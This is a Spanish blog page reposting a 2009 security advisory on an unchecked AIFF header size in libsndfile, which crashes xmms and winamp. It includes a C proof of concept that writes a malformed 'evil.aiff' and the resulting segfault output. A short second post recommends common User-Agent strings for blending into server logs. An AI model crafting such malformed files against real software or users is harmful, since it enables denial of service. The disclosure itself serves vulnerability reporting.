sábado, 14 de febrero de 2009

libsndfile AIFF buffer unverified

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

libsndfile AIFF buffer unverified

A security issue affects the following library/software releases

libsndfile <= 1.0.17
xmms-sndfile <= 1.2_4
winamp <= 5.541

And possibly more

- -BACKGROUND

Libsndfile is a C library for reading and writing files containing sampled
sound (such as MS Windows WAV and the Apple/SGI AIFF format) through one
standard library interface.

- -DESCRIPTION

Testing and debugging winamp, I have verified that the bug is specific to
the library libsndfile. I saw that some of the functions of reading gives
AIFF file headers, this does not check the limits of (CommonChunk.ckSize).
There may be other functions with the same problem. One of the errors
occur when unverified memset is called the limit of memory.

Quote segment code at src/aiff.c: 847
============================================================
else if (comm_fmt->size >= SIZEOF_AIFC_COMM)
{
//Some lines omitted

memset (psf-> u.scbuf, 0, comm_fmt-> size);
============================================================

- -CODE

============================================================
#include<stdio.h>
#include<stdlib.h>

#define AIFFSIZE 81
char *aiffbuff =
"\x46\x4f\x52\x4d\x00\x04\xcd\xec\x41\x49\x46\x46\x43\x4f\x4d\x4d\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x20\x5e\x01\x18\x0f\x3c\x0e\xe4"
"\x00";

int main(void) {
FILE *aiff = fopen("evil.aiff","w+");
fwrite(aiffbuff,AIFFSIZE,1,aiff);
fclose(aiff);
}

============================================================

At the time that these applications process the file with invalid headers,
stop for an unexpected error, tcsh sample:

============================================================

Anon@localhost % xmms -v
xmms 1.2.11
Anon@localhost % xmms -p evil.aiff

Segmentation fault

You've probably found a bug in XMMS, please visit
http://bugs.xmms.org and fill out a bug report.

============================================================

- -IMPACT

Just a fun, but without using Denial of Service to any programs
that run the library.

Att.

Anon[at]elhacker.net


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (FreeBSD)

iQCVAwUBSZbcxT0RloP1tHX9AQIfTQP/aqqzwsVwQow4U4D1lzM0CYIVymjYmL7+
k1qmq4cypYyaSCYUt9KXBIh52hWYFtFfMlrYnREgbf+zDIgme6syUkU7EfE567ah
1tXhjJdYlC3CrKc6t2psUqyuhHBDU8YVyLyuTvTvWykQjVRKJUlfvNEeB97CVvHe
rrl8KwnEItk=
=FNmo
-----END PGP SIGNATURE-----

Otro User Agent para usar.

Como recordaran en un post anterior: ¿Que User-Agent usar? Para no sobresalir en los Logs

Ahi vimos que uno de los user agent mas comunes es del IE 6 Bajo Windows 5.1 (Generalmente windows XP).

con el siguiente User-Agent: Mozilla/4.0 (compatible; U; MSIE 6.0; Windows NT 5.1)

Posiblemente sea por qu muchos usan Copias Piratas de Windows y no pueden actualizarse a IE 7 pero bueno eso fue otro tema.

Usando Firefox el mas comun es: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5

Sin embargo esto cambiaria rapidamente con las actualizacaciones automaticas de FIrefox, cambiaria a la 3.0.6 y tal vez la version de Gecko.

Saludos.

Populares Siempre